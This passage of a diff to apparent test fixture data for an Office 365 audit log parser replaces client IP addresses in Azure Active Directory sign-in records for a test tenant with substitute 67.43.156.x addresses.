Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"4819a0c2-2050-4549-ab66-f5b90cbbcc5a\",\"InterSystemsId\":\"612b339f-1088-a000-f25f-9c8af4d57894\",\"IntraSystemId\":\"c847a864-4ba2-4d8b-a9f2-5f1c1c5c5e00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -1724,10 +1724,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "00000003-0000-0ff1-ce00-000000000000", "AzureActiveDirectoryEventType": 1, - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-07T16:43:51", "ExtendedProperties": [ { @@ -1777,7 +1777,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"80ccca67-54bd-44ab-8625-4b79c4dc7775\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T21:38:29\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"e94002d9-f6e8-46f9-8702-2a29e908e73d\",\"InterSystemsId\":\"61eb5713-2687-4c00-a7b2-fde4788c395b\",\"IntraSystemId\":\"3db9a461-6dd1-4950-b3e3-fbe8c2d5c700\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"80ccca67-54bd-44ab-8625-4b79c4dc7775\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:29\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"e94002d9-f6e8-46f9-8702-2a29e908e73d\",\"InterSystemsId\":\"61eb5713-2687-4c00-a7b2-fde4788c395b\",\"IntraSystemId\":\"3db9a461-6dd1-4950-b3e3-fbe8c2d5c700\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -1795,10 +1795,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ApplicationId": "80ccca67-54bd-44ab-8625-4b79c4dc7775", "AzureActiveDirectoryEventType": 1, - "ClientIP": "79.159.10.151", + "ClientIP": "67.43.156.13", "CreationTime": "2020-02-12T21:38:29", "ExtendedProperties": [ { @@ -1848,7 +1848,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T21:38:37\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"1ca4f684-3a34-44a8-99b8-064d1071768a\",\"InterSystemsId\":\"61f81224-65fd-4c1b-b388-ee0e25485191\",\"IntraSystemId\":\"dc0cc415-9a00-470d-bda3-867e11fdd400\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:37\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"1ca4f684-3a34-44a8-99b8-064d1071768a\",\"InterSystemsId\":\"61f81224-65fd-4c1b-b388-ee0e25485191\",\"IntraSystemId\":\"dc0cc415-9a00-470d-bda3-867e11fdd400\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -1866,10 +1866,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "79.159.10.151", + "ClientIP": "67.43.156.13", "CreationTime": "2020-02-12T21:38:37", "ExtendedProperties": [ { @@ -1919,7 +1919,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T10:51:50\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"3f6c8eb2-c64b-4dc5-b8fd-be252f8e09c2\",\"InterSystemsId\":\"661f2330-3e04-483d-9781-caaa4543cc13\",\"IntraSystemId\":\"01c15486-46e2-487a-91f5-11445da0b600\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:51:50\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"3f6c8eb2-c64b-4dc5-b8fd-be252f8e09c2\",\"InterSystemsId\":\"661f2330-3e04-483d-9781-caaa4543cc13\",\"IntraSystemId\":\"01c15486-46e2-487a-91f5-11445da0b600\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -1937,10 +1937,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "79.159.10.151", + "ClientIP": "67.43.156.13", "CreationTime": "2020-02-12T10:51:50", "ExtendedProperties": [ { @@ -1990,7 +1990,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:42\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"b290b902-b6f2-49f6-b7f8-ea1541d85c8c\",\"InterSystemsId\":\"68d7eaa4-aa57-4508-9792-09e80c911aa1\",\"IntraSystemId\":\"1590b91f-bffe-4cd8-9028-de52692f5400\",\"ModifiedProperties\":[],\"ObjectId\":\"0f698dd4-f011-4d23-a33e-b36416dcb1e6\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"0f698dd4-f011-4d23-a33e-b36416dcb1e6\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:42\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"b290b902-b6f2-49f6-b7f8-ea1541d85c8c\",\"InterSystemsId\":\"68d7eaa4-aa57-4508-9792-09e80c911aa1\",\"IntraSystemId\":\"1590b91f-bffe-4cd8-9028-de52692f5400\",\"ModifiedProperties\":[],\"ObjectId\":\"0f698dd4-f011-4d23-a33e-b36416dcb1e6\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"0f698dd4-f011-4d23-a33e-b36416dcb1e6\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -2008,10 +2008,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:13:42", "ExtendedProperties": [ { @@ -2061,7 +2061,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:42:59\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"b0c1c4a7-c6db-4f14-b628-54e37a7a6785\",\"InterSystemsId\":\"6ae96167-2df2-425c-9f91-27e6345eb782\",\"IntraSystemId\":\"f54da4fe-0a54-45f3-b6ea-39f873eb6000\",\"LogonError\":\"FlowTokenExpired\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:42:59\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"b0c1c4a7-c6db-4f14-b628-54e37a7a6785\",\"InterSystemsId\":\"6ae96167-2df2-425c-9f91-27e6345eb782\",\"IntraSystemId\":\"f54da4fe-0a54-45f3-b6ea-39f873eb6000\",\"LogonError\":\"FlowTokenExpired\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -2079,10 +2079,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "AzureActiveDirectoryEventType": 1, - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-07T16:42:59", "ExtendedProperties": [ { @@ -2125,7 +2125,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:43:02\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"FlowTokenScenario\",\"Value\":\"Login\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"1\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"82d834e4-f6f2-476a-902e-e1e9fd6f87d8\",\"InterSystemsId\":\"6ae96167-2df2-425c-9f91-27e6345eb782\",\"IntraSystemId\":\"7fa5e138-ac87-4063-a278-56c6c6965e00\",\"LogonError\":\"UserStrongAuthClientAuthNRequiredInterrupt\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoginFailed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Failed\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:02\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"FlowTokenScenario\",\"Value\":\"Login\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"1\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"82d834e4-f6f2-476a-902e-e1e9fd6f87d8\",\"InterSystemsId\":\"6ae96167-2df2-425c-9f91-27e6345eb782\",\"IntraSystemId\":\"7fa5e138-ac87-4063-a278-56c6c6965e00\",\"LogonError\":\"UserStrongAuthClientAuthNRequiredInterrupt\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoginFailed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Failed\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -2143,10 +2143,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "AzureActiveDirectoryEventType": 1, - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-07T16:43:02", "ExtendedProperties": [ { @@ -2197,7 +2197,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T21:38:19\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 